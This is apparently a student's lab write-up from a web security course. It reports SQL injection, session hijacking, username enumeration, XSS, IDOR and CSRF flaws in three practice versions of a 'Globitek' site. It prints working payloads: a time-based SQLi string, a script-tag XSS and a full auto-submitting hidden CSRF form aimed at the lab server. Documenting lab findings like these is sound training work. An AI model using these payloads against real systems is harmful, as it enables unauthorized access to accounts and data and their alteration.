Time spent: 5 hours spent in total
Objective: Identify vulnerabilities in three different versions of the Globitek website: blue, green, and red.
The six possible exploits are:
- Username Enumeration
- Insecure Direct Object Reference (IDOR)
- SQL Injection (SQLi)
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
- Session Hijacking/Fixation
Each version of the site has been given two of the six vulnerabilities. (In other words, all six of the exploits should be assignable to one of the sites.)
Vulnerability #1: SQL Injection (SQLi)
- The Attacker is Injects a sql command instead of the proper Salesperson's ID Number.
- Injected SQL Command:
%27%20OR%20SLEEP(5)=0--%27
- This causes the Database command to wait for 5 seconds while quering the data.
Vulnerability #2: Session Hijacking/Fixation
- The Victim's session ID is obtained through the tool that is provided by the codepath
- Using burp, we can intercept the attacker's access attempt to and secure site
- From the intercepted packet, we can modify the session ID to the one we obtained from the Victim
- Once the packet is forwarded, the attacker is logged in using the Victim's session ID
Vulnerability #1: Username Enumeration
- As you can see from above, the Green Website has the Username Enumeration error where the failure to login message differs for the Username that exists vs doesn't exist.
- Using Chrome's debugging tool, I was able to see that the Developer assigns two different classes, failed and failure, to the error message depending on the login senerio.
- The "failure" class is applied an bold style in css while "failed" class doesn't. (Screen shots below)
Vulnerability #2: Cross-Site Scripting (XSS)
- Attacker can inject an XSS in their feedback form.
- Injected XSS Command:
<script>alert('Jinwoo found the XSS!');</script>
- This XSS runs once the account holder checks their feedback page
Vulnerability #1: Insecure Direct Object Reference
- Above GIF show an attacker getting access to the hidden user's accounts that the attacker is not permitted to view.
- This is done through modifying the "id" parameter in the URL's to change the GET request.
- Below are the accounts that the Attacker is able to access:
- ID: 1 NAME: Daron Burke
- ID: 2 NAME: Sherry Trevino
- ID: 3 NAME: Irene Boliing
- ID: 4 NAME: Robert Hamilton
- ID: 5 NAME: Ken Barker
- ID: 6 NAME: Elizabeth Olson
- ID: 7 NAME: Samuel Hunter
- ID: 8 NAME: Kim Stanley
- ID: 9 NAME: Barbara Hinckley
- ID: 10 NAME: Testy McTesterson <!-- Illegal access -->
- ID: 11 NAME: Lazy Lazyman <!-- Illegal access -->
Vulnerability #2: Cross-Site Request Forgery (CSRF)
- Created a malicious page that utilizes the user's session to forge a request to the database:
<html>
<head>
<title>NOT A FAKE FORM</title>
</head>
<body onload="document.my_form.submit()">
<form action="https://35.184.199.7/red/public/staff/salespeople/edit.php?id=5" method="POST" name="my_form" style="display: none;" target="hidden_results" >
<input type="text" name="first_name" value="TROLLEDDDD" />
<input type="text" name="last_name" value="SORRY_Mr.Barker" />
<input type="text" name="phone" value="777-777-7777" />
<input type="text" name="email" value="TROLLED@TORLLED.COM" />
</form>
<iframe name="hidden_results" style="display: none;"></iframe>
</body>
</html>
- This page secretly makes a post request on page load and hides the outcome in a hidden iframe.
- As result, an account in the database is altered.
GIF created with LiceCap.
Copyright [2017] [Jinwoo Yom]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.